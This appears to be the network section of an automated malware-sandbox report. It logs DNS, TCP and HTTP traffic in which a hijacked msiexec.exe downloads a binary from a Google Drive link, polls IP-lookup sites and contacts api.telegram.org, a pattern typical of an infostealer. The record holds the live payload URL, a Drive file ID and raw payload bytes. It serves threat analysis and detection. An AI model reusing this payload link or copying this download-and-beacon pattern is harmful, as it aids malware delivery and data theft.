Nov 21, 2024 10:37:20.928862095 CET	49795	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:21.048389912 CET	80	49795	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:22.279377937 CET	80	49795	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:22.281032085 CET	49801	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:22.281079054 CET	443	49801	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:22.281164885 CET	49801	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:22.281510115 CET	49801	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:22.281526089 CET	443	49801	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:22.322696924 CET	49795	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:23.586167097 CET	443	49801	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:23.587977886 CET	49801	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:23.588001966 CET	443	49801	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:24.049313068 CET	443	49801	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:24.049484968 CET	443	49801	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:24.049577951 CET	49801	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:24.050028086 CET	49801	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:24.087382078 CET	49795	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:24.207231045 CET	80	49795	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:24.207387924 CET	49795	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:24.321633101 CET	49806	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:24.321749926 CET	443	49806	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:24.321860075 CET	49806	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:24.322374105 CET	49806	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:24.322403908 CET	443	49806	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:25.696227074 CET	443	49806	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:25.696378946 CET	49806	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:25.698532104 CET	49806	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:25.698548079 CET	443	49806	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:25.698888063 CET	443	49806	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:25.700367928 CET	49806	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:25.747344971 CET	443	49806	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:26.199915886 CET	443	49806	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:26.200073004 CET	443	49806	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:26.200186968 CET	49806	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:26.202439070 CET	49806	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:32.396619081 CET	49742	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:32.612737894 CET	49824	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:32.612785101 CET	443	49824	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:32.613074064 CET	49824	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:32.613312006 CET	49824	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:32.613327980 CET	443	49824	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:34.072730064 CET	443	49824	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:34.074259996 CET	49824	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:34.074295044 CET	443	49824	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:34.074388027 CET	49824	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:34.074407101 CET	443	49824	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:34.773097992 CET	443	49824	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:34.773202896 CET	443	49824	149.154.167.220	192.168.2.4
Nov 21, 2024 10:37:34.773261070 CET	49824	443	192.168.2.4	149.154.167.220
Nov 21, 2024 10:37:34.773745060 CET	49824	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 10:36:44.740709066 CET	55963	53	192.168.2.4	1.1.1.1
Nov 21, 2024 10:36:44.968758106 CET	53	55963	1.1.1.1	192.168.2.4
Nov 21, 2024 10:36:47.274569988 CET	63321	53	192.168.2.4	1.1.1.1
Nov 21, 2024 10:36:47.502852917 CET	53	63321	1.1.1.1	192.168.2.4
Nov 21, 2024 10:36:54.492470980 CET	52998	53	192.168.2.4	1.1.1.1
Nov 21, 2024 10:36:54.719132900 CET	53	52998	1.1.1.1	192.168.2.4
Nov 21, 2024 10:36:57.009727955 CET	58374	53	192.168.2.4	1.1.1.1
Nov 21, 2024 10:36:57.235858917 CET	53	58374	1.1.1.1	192.168.2.4
Nov 21, 2024 10:37:24.088157892 CET	64883	53	192.168.2.4	1.1.1.1
Nov 21, 2024 10:37:24.320821047 CET	53	64883	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2024 10:36:44.740709066 CET	192.168.2.4	1.1.1.1	0xddb7	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:47.274569988 CET	192.168.2.4	1.1.1.1	0x6b16	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:54.492470980 CET	192.168.2.4	1.1.1.1	0xde0a	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:57.009727955 CET	192.168.2.4	1.1.1.1	0x801f	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:37:24.088157892 CET	192.168.2.4	1.1.1.1	0x39f1	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 21, 2024 10:36:44.968758106 CET	1.1.1.1	192.168.2.4	0xddb7	No error (0)	drive.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:47.502852917 CET	1.1.1.1	192.168.2.4	0x6b16	No error (0)	drive.usercontent.google.com		172.217.16.129	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:54.719132900 CET	1.1.1.1	192.168.2.4	0xde0a	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 10:36:54.719132900 CET	1.1.1.1	192.168.2.4	0xde0a	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:54.719132900 CET	1.1.1.1	192.168.2.4	0xde0a	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:54.719132900 CET	1.1.1.1	192.168.2.4	0xde0a	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:54.719132900 CET	1.1.1.1	192.168.2.4	0xde0a	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:54.719132900 CET	1.1.1.1	192.168.2.4	0xde0a	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:57.235858917 CET	1.1.1.1	192.168.2.4	0x801f	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:36:57.235858917 CET	1.1.1.1	192.168.2.4	0x801f	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 10:37:24.320821047 CET	1.1.1.1	192.168.2.4	0x39f1	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	132.226.247.73	80	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 10:36:54.847724915 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 10:36:56.266486883 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:36:56 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ad506bfc813be7b4d0a5fd0a04e3692a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 21, 2024 10:36:56.270468950 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 10:36:56.732161045 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:36:56 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cf287bb0360b475e32bf2e2bbbc8256d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 21, 2024 10:36:59.013725042 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 10:36:59.455626011 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:36:59 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4723ecec01c0fd7baf775ed54025d572 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49742	132.226.247.73	80	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 10:37:01.297985077 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 10:37:02.602108002 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:02 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 18ca110b8b1f5379bc0de7a0da06b24a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49750	132.226.247.73	80	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 10:37:04.502619982 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 10:37:05.811295986 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6f51dd143e853764468bb37a60bfd389 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49757	132.226.247.73	80	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 10:37:07.663763046 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 10:37:09.062751055 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 57cf94e589bd6d0eab3d5bea5294b65d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49769	132.226.247.73	80	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 10:37:10.915276051 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 10:37:12.284670115 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9ba886fca6f0bc497a927c400376b95d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49776	132.226.247.73	80	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 10:37:14.123074055 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 10:37:15.518369913 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 18d7ed9bf28b8a56c07ee4dc2f9139ed Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49788	132.226.247.73	80	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 10:37:17.689116001 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 10:37:19.085024118 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1d11a0720f97d89485faf734cca4aaef Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49795	132.226.247.73	80	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 10:37:20.928862095 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 10:37:22.279377937 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: be494e1f3ae4d4460df384e69af3ba83 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	142.250.186.78	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:36:46 UTC	216	OUT	GET /uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-11-21 09:36:47 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 21 Nov 2024 09:36:47 GMT Location: https://drive.usercontent.google.com/download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-YMh7iJEr3b5aJZUiOHcSxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	172.217.16.129	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:36:48 UTC	258	OUT	GET /download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-11-21 09:36:51 UTC	4915	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="Spbzvk155.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 278080 Last-Modified: Tue, 19 Nov 2024 20:53:03 GMT X-GUploader-UploadID: AFiumC6n_TvM95NIA9pXozKBPiOkYWguIP-z3T-Ra_-42qpjxoaDplyeko9WxjWfsB-Et4phaqoRm2FraQ Date: Thu, 21 Nov 2024 09:36:51 GMT Expires: Thu, 21 Nov 2024 09:36:51 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=yMkrWA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-21 09:36:51 UTC	4915	IN	Data Raw: 0e 65 04 d7 3c 71 e9 c1 3a f9 31 e8 9d d8 5f d6 d9 f1 6b 2d bf 82 6a cc 1f a8 2e 5e d3 0d 7a ce 18 60 bc f9 73 c7 1b 65 b1 83 8a 5e e8 b4 c9 1f 89 75 c7 dc 95 e2 de b7 07 8b a1 9b ea e2 b0 f7 a6 76 25 19 9c 27 86 24 df e9 0f 17 3e 8f 9e e9 cb d1 a0 61 64 95 dd 0e 88 fa 8d 68 88 3e f4 f7 33 32 fa 94 cb a1 fe b8 77 05 b7 8a 26 27 e3 ca 46 3a cc ab ad 69 34 41 7b e1 1a 02 50 38 b8 e9 ed 46 70 5f d7 6c c1 2f fe 3e a4 06 63 30 e5 b2 06 39 07 cd 0d 4e f6 72 9b 44 ac 9c 0d 70 92 b3 51 6e c8 5b fb 56 2f cf 16 ad e8 23 2f 87 00 af 58 2b 70 58 f2 17 79 e9 24 11 e6 ea c4 58 f4 39 09 ac ac 52 a4 62 5a b5 10 b1 65 5d a1 33 af 13 03 ca 47 53 30 33 66 65 21 c0 54 28 90 ba 40 5a 84 27 46 4c ff fd 11 23 b0 22 a9 c4 2f 66 b8 63 dc 0a 98 e3 f0 72 8a 60 cb 8b 65 0f 2d c3 d7 Data Ascii: e<q:1_k-j.^z`se^uv%'$>adh>32w&'F:i4A{P8Fp_l/>c09NrDpQn[V/#/X+pXy$X9RbZe]3GS03fe!T(@Z'FL#"/fcr`e-
2024-11-21 09:36:51 UTC	4868	IN	Data Raw: f6 bb 9d ca 6b f0 0e b1 07 e7 20 b4 6b b4 0e e7 09 e5 59 55 f1 2d 06 10 3e 5e 1a f6 f6 b2 8a 5b 99 ed f7 73 5e c3 99 89 22 69 5b 40 36 86 c0 3e 63 06 32 89 35 75 2c 41 70 1b 02 b6 1a 4b 8a 60 56 12 bd 61 c2 cf ea 91 98 51 b2 15 ca d8 f2 50 c7 6b 3c 49 77 1f 56 0b 47 49 ff 23 bc 4a 35 64 d0 f5 99 8f a1 17 2e d1 57 c7 1f a8 68 d7 b4 82 7f ac 5d bb 05 81 10 e0 a4 f3 04 c0 20 bc 88 ee a6 98 da a3 c1 9a bc 1c 9f ef c3 4c d8 49 83 35 6b e8 ca b4 ad 73 dc b2 64 e5 e5 ee 4a 8b b6 49 ba 10 a4 f8 f6 d1 d4 e5 b3 84 1a c1 83 a9 2f 5c e7 33 ec 61 04 1f 38 d7 ee de a9 57 ce ed d6 2f 08 38 29 e1 94 c8 46 66 16 0d a3 33 de db 2b 3a 5b 6d 9d 2a de c8 88 6e a1 04 cd 4a 88 b0 a8 0b f1 7c 9a d8 59 1d 5b 21 7a 7b 1f a7 01 05 04 33 48 65 9f db ee c5 54 f7 4b ed 37 0f d2 c8 93 Data Ascii: k kYU->^[s^"i[@6>c25u,ApK`VaQPk<IwVGI#J5d.Wh] LI5ksdJI/\3a8W/8)Ff3+:[m*nJ\|Y[!z{3HeTK7
